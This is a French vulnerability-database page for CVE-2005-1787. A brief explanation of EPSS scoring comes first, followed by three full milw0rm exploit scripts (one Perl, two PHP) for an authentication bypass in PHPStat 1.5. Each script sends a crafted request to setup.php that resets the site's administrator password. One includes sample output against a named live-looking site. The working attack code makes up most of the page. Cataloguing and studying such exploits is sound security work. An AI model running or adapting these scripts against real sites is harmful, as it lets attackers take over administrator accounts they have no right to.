CVE-2005-1787 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

#!/usr/bin/perl ##################################################################### #T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m ##################################################################### # EXPLOIT FOR - PHPStat Setup.PHP Authentication Bypass Vulnerability # #Exploit By : A l p h a _ P r o g r a m m e r ( Sirus-v ) #E-Mail : [email protected] # #This Xpl Change Admin's Pass in This Portal !! #Discovered by: SoulBlack # #Vulnerable Version : phpStat 1.5 # ##################################################################### # Gr33tz To ==> mh_p0rtal , Oil_karchack , Str0ke & AlphaST.Com # # So Iranian Hacking & Security Teams : # # Crouz , Shabgard , Simorgh-ev ,IHS , Emperor & GrayHatz.NeT ##################################################################### use IO::Socket; if (@ARGV < 3) { print "\n==========================================\n"; print " \n -- Exploit By Alpha Programmer --\n\n"; print " Trap-Set UnderGrounD Hacking Team \n\n"; print " Usage: <T4rg3t> <DIR> <Password>\n\n"; print "==========================================\n\n"; print "Examples:\n\n"; print " phpStat.pl www.Site.com /phpstat/ 12345\n"; exit(); } my $host = $ARGV[0]; my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" ); unless ($remote) { die "C4nn0t C0nn3ct to $host" } print "C0nn3cted\n"; $http = "GET $ARGV[1]setup.php?check=yes&username=admin&password=$ARGV[2] HTTP/1.0\n"; $http .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)\n"; $http .= "Host: $host\n\n\n\n"; print "[+]Sending H3ll Packet ...\n"; print $remote $http; sleep(1); print "[+]Wait For Authentication Bypass ...\n"; sleep(100); while (<$remote>) { } print "[+]OK ! Now Goto $host$ARGV[1]setup.php And L0gin Whith:\n\n"; print "[+]User: admin\n"; print "[+]Pass: $ARGV[2]"; # milw0rm.com [2005-05-30]

<?php error_reporting(E_PARSE); /* ================================================================ PHP Stat Administrative User Authentication Bypass POC Exploit ================================================================ ====Trap-Set Underground Hacking Team===========mh_p0rtal============ Greetz to : Alpha_programmer , Oil_karchack , Str0ke And Iranian Hacking & Security Teams : Alphast , IHS Team , Shabgard Security Team , Emperor Hacking TEam , CrouZ Security Team , Simorgh-ev Security Team , ====================^^^^^^^^^^^^^^^^^^^-========================= */ # Config ________________________________ # address - example: http://www.site.com/setup.php Or www.site.com /dir/setup.php $url = "http://www.site.com/setup.php"; # EnD ___________________________________ print "<form action=\"$url?check=yes&username=$username&password=$password\" >"; print "<input type=\"hidden\" name=\"check\" value=\"yes\">"; print "Username : <input type=\"text\" name=\"username\" value=\"admin\" size=\"25\"><br>"; print "Password : <input type=\"text\" name=\"password\" value=\"abc123\" size=\"25\"><br>"; print ("<input type=submit value=::Change. > \n"); print "</form>"; //------------------------------------------------------End. ?> # milw0rm.com [2005-05-30]

<? /* ************************************************************** PHP Stat Administrative User Authentication Bypass POC Exploit Code by Nikyt0x - Soulblack Security Research ************************************************************** Advisory: http://www.soulblack.com.ar/repo/papers/phpstat_advisory.txt Saludos: Soulblack Staff, Status-x, NeosecurityTeam, KingMetal, SWP, Trespasser... [email protected] http://www.nikyt0x.tk ************************************************************** **This Exploit Change Admin Username and Password **Username: admin **Password: admin ************************************************************** php sbphpstatpoc.php www.spazfarm.com /spazstats/setup.php ============================================================== PHP Stat Administrative User Authentication Bypass POC Exploit ============================================================== by Nikyt0x - Soulblack Security Research [+] Testing: www.spazfarm.com [+] Socket [+] Sending Exploit [+] OK Open www.spazfarm.com/spazstats/setup.php Username: admin Password: 123456 ************************************************************** */ // username and password $username = "admin"; $password = "123456"; function sh0w() { echo "\n ==============================================================\n"; echo " PHP Stat Administrative User Authentication Bypass POC Exploit\n"; echo " ==============================================================\n"; echo " by Nikyt0x - Soulblack Security Research\n\n"; } if ($argc != 3) { sh0w(); echo "\n\n Usage:\n sbphpstatpoc.php www.site.com /dir/to/setup.php\n"; exit(); } if(!ereg('setup.php',$argv[2])) { echo "URL to setup.php Incorrect.\n"; exit(0); } sh0w(); echo " [+] Testing: $argv[1]\n"; $s0ck3t = fsockopen($argv[1], 80); if (!$s0ck3t) { echo " [-] Socket\n"; exit(0); } else { $petici0n = "GET $argv[2]?check=yes&username=$username&password=$password HTTP/1.1\r\n"; $petici0n .= "Host: $argv[1]\r\n"; $petici0n .= "Connection: Close\r\n\r\n"; echo " [+] Socket\n"; if(!fwrite($s0ck3t, $petici0n)) { echo " [-] Sending Exploit\n"; exit(0); } echo " [+] Sending Exploit\n"; while (!feof($s0ck3t)) { $g3tdata = fgets($s0ck3t, 1024); if (eregi('Setup has been updated',$g3tdata)) { echo " [+] OK\n\n"; echo " Open $argv[1]$argv[2]\n\n Username: $username\n Password: $password\n"; exit(); } } fclose($s0ck3t); } ?> # milw0rm.com [2005-05-30]